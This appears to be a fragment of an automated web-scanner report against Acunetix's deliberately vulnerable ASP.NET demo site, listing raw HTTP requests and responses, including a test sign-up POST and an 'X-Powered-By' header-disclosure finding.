Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18076
Response Body - size: 18,076 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMJd1ucUfNI8x3o4I+C+TrBHqvCj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 407 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1060 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,060 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc%2BmKdRBm3AUE&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13329
Response Body - size: 13,329 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql/xMtNSXxlEXNG8K/C7XIc2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" 